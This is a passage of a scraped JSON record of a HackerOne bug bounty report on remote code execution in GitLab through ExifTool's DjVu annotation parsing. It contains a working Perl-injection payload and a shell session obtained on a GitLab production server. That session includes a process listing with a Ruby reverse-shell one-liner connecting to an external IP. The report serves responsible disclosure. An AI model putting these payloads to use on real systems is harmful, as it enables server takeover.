Fg4UwVuaYIyKOM3p8MmMPK49ANhsfPY8fEtcsZC95VoaRdDm1Jh4gAE%2BKOSIfRfYs8Ir4G9iV3y%2BEw0PaEin7KbMrK1PXP2NgP8ihDMmLBtkgHP4R3gWmSr6TFGEjjzkFg29piw6R2gf%2BsnOUcVHQ%2Bbykt5ZsLVJ6EAXwNLTtknikITXdf6QaFbNqpBL8jZTpqUojxBG%2BtiNkb3557C1fkdf3NJsD3Zx7cWluj1BIK%2BkyIyWDNgbbZPdfoizDu1v2EBjqlAZS9dnRnVRqVP9fLTb9RTqDreveCA7B0QYo0UdzsJzmPEO4oMhr6Znr61%2BYsrB8tEZb8%2BMQIUalovwSHY87FE3aKKXkyJGynS62%2FV%2BFm6xl5nMwIVNltgFIXfoaYYZuGW%2FofSyNlx7MTpnOulJFZCDvWJ4pJowmpBXXUafFISG238wJrGxyiKP%2B%2FE71eaPJE6HnX9iBBY6HDI2S%2Fqcw%2FcqbCsqnyAA%3D%3D&X-Amz-Signature=bda2e487f4664e67b33484a6c9e3d2ca0ccd80e4e9302b7337204631bd14b0f6"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T07:29:46", "differentElements": ["h1reporter"], "edition": 12}, {"bulletin": {"id": "H1:1154542", "hash": "a39c38f4cb7863fd426c7380aeb88420", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 